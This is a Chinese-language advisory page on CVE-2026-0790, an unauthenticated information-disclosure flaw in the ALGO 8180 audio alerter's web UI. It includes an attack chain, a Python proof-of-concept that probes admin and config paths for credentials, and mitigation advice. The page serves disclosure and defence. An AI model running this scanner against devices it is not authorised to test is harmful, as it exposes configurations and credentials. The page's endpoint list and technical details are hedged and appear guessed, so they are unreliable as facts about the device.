CVE-2026-0790: ALGO 8180 IP Audio Alerter Web UI信息泄露漏洞

漏洞信息

漏洞编号

CVE-2026-0790

漏洞类型

信息泄露

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ALGO 8180 IP Audio Alerter

漏洞概述

CVE-2026-0790是ALGO 8180 IP Audio Alerter设备Web用户界面中存在的一个信息泄露漏洞。该漏洞由趋势科技零日 Initiative（ZDI）发现，编号为ZDI-CAN-28299。ALGO 8180是一款网络音频告警设备，广泛应用于办公楼、医院、学校等场所的公共广播和紧急通知系统。攻击者无需任何认证凭证，即可通过直接访问特定URL路径来获取设备上的敏感信息，包括系统配置、网络设置、管理员凭据（如果存储在客户端可见的位置）以及其他配置数据。由于该设备通常部署在企业网络的关键位置，泄露的信息可能被用于进一步的网络侦察和横向移动攻击。此漏洞的CVSS 3.1评分为7.5分，属于高危级别，主要风险在于机密性影响较高，而完整性和可用性影响为零。远程攻击者可以通过互联网发起攻击，无需任何用户交互，这大大增加了漏洞的利用可能性。对于依赖该设备进行关键通信的组织而言，此漏洞构成了严重的安全威胁。

技术细节

该漏洞的根本原因在于ALGO 8180 IP Audio Alerter的Web应用程序未能对敏感页面实施适当的访问控制。攻击者可以通过直接请求特定的URL路径来绕过正常的认证流程访问本应需要授权的内容。具体来说，Web UI中的某些端点（如管理页面、状态页面或配置页面）仅依赖客户端的隐藏或简单的访问控制，而非强制性的服务器端认证检查。攻击者通过分析Web应用的目录结构或使用常见的Web路径字典，可以发现这些未受保护的端点。一旦攻击者直接访问这些URL，服务器会返回完整的响应内容，其中可能包含设备序列号、IP地址配置、VLAN设置、SNMP配置、用户账户信息等敏感数据。这种类型的漏洞通常被称为'直接对象引用'（IDOR）或'强制浏览'漏洞。攻击者不需要利用任何注入载荷或复杂的攻击技术，仅需构造正确的HTTP GET请求即可获取目标数据。

攻击链分析

STEP 1

步骤1: 侦察与目标发现

攻击者识别运行ALGO 8180 IP Audio Alerter固件的目标设备，可能通过Shodan、Censys等搜索引擎或网络扫描发现暴露在互联网上的设备Web管理界面

STEP 2

步骤2: 端点枚举

攻击者使用目录遍历或常见Web路径字典对目标设备进行探测，识别可访问但未受适当保护的Web UI端点，如/admin/、/status/、/config/等路径

STEP 3

步骤3: 直接请求访问

攻击者构造HTTP GET请求直接访问敏感端点URL，由于Web应用未实施强制认证检查，服务器直接返回包含敏感信息的响应内容

STEP 4

步骤4: 信息提取与分析

攻击者提取响应中的敏感数据，包括设备序列号、IP地址配置、VLAN设置、SNMP配置、可能的用户账户信息等，用于后续攻击或情报收集

STEP 5

步骤5: 横向移动准备

利用获取的设备配置信息（如网络参数、管理凭证），攻击者可以进一步探测内网环境或尝试对同一网络中的其他设备发起攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2026-0790 PoC - ALGO 8180 IP Audio Alerter Information Disclosure
# Vulnerability: Direct Request to Sensitive Endpoints
# CVSS: 7.5 (High) - No Authentication Required

import requests
import sys
import json
from urllib.parse import urljoin

class CVE20260790POC:
    def __init__(self, target_url):
        self.target_url = target_url.rstrip('/')
        self.session = requests.Session()
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 (compatible; CVE-Scanner/1.0)'
        })
        
    def check_vulnerability(self):
        """Check if target is vulnerable to CVE-2026-0790"""
        # Common sensitive endpoints that may be accessible without auth
        sensitive_endpoints = [
            '/admin/',
            '/admin/settings',
            '/status/',
            '/status/network',
            '/config/',
            '/config/system',
            '/api/status',
            '/api/config',
            '/cgi-bin/status',
            '/cgi-bin/config',
            '/debug/',
            '/diagnostics/',
            '/main.html',
            '/settings.html',
            '/network.html'
        ]
        
        vulnerable_endpoints = []
        
        print(f'[*] Scanning target: {self.target_url}')
        print(f'[*] Testing {len(sensitive_endpoints)} endpoints...\n')
        
        for endpoint in sensitive_endpoints:
            try:
                url = urljoin(self.target_url, endpoint)
                response = self.session.get(url, timeout=10, verify=False)
                
                if response.status_code == 200:
                    content_length = len(response.content)
                    content_preview = response.text[:200].replace('\n', ' ')
                    
                    # Check if response contains sensitive keywords
                    sensitive_keywords = ['password', 'username', 'ip', 'config', 
                                         'serial', 'admin', 'secret', 'key', 'credential']
                    has_sensitive = any(kw.lower() in response.text.lower() 
                                       for kw in sensitive_keywords)
                    
                    if has_sensitive:
                        print(f'[+] VULNERABLE: {endpoint}')
                        print(f'    Status: {response.status_code}')
                        print(f'    Size: {content_length} bytes')
                        print(f'    Preview: {content_preview}...')
                        print()
                        vulnerable_endpoints.append({
                            'endpoint': endpoint,
                            'status_code': response.status_code,
                            'content_length': content_length
                        })
                    else:
                        print(f'[*] Accessible: {endpoint} (may contain info)')
                        
            except requests.exceptions.RequestException as e:
                print(f'[-] Error accessing {endpoint}: {str(e)}')
                
        return vulnerable_endpoints
    
    def generate_report(self, results):
        """Generate vulnerability report"""
        report = {
            'cve_id': 'CVE-2026-0790',
            'target': self.target_url,
            'vulnerable': len(results) > 0,
            'vulnerable_endpoints': results,
            'recommendation': 'Apply vendor patch or restrict web access'
        }
        return report

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: python cve_2026_0790_poc.py <target_url>')
        print('Example: python cve_2026_0790_poc.py http://192.168.1.100')
        sys.exit(1)
        
    target = sys.argv[1]
    poc = CVE20260790POC(target)
    results = poc.check_vulnerability()
    report = poc.generate_report(results)
    
    print('\n' + '='*60)
    print('VULNERABILITY REPORT')
    print('='*60)
    print(json.dumps(report, indent=2))
    
    if results:
        print('\n[!] Target is VULNERABLE to CVE-2026-0790')
    else:
        print('\n[*] No vulnerable endpoints found')

影响范围

ALGO 8180 IP Audio Alerter (固件版本 <= 未知受影响版本)

具体受影响版本需参考厂商官方公告确认

防御指南

临时缓解措施

在厂商发布官方修复补丁之前，建议采取以下临时缓解措施：首先，通过网络访问控制列表（ACL）或防火墙规则，限制对ALGO 8180设备Web管理端口的访问，仅允许受信任的管理IP地址访问；其次，如果业务允许，暂时禁用设备的Web管理界面功能，改用本地控制台或安全的远程管理协议；此外，监控网络流量和设备日志，警惕异常的HTTP请求模式，特别是针对常见管理路径的大量探测行为；最后，确保设备不在公网直接暴露，建议将其部署在VPN或私有网络后方，并定期更换所有管理账户的密码。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-0790
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-0790
3 Details https://www.cvedetails.com/cve/CVE-2026-0790/
4 VulDB https://vuldb.com/cve/CVE-2026-0790
5 Link https://www.zerodayinitiative.com/advisories/ZDI-26-012/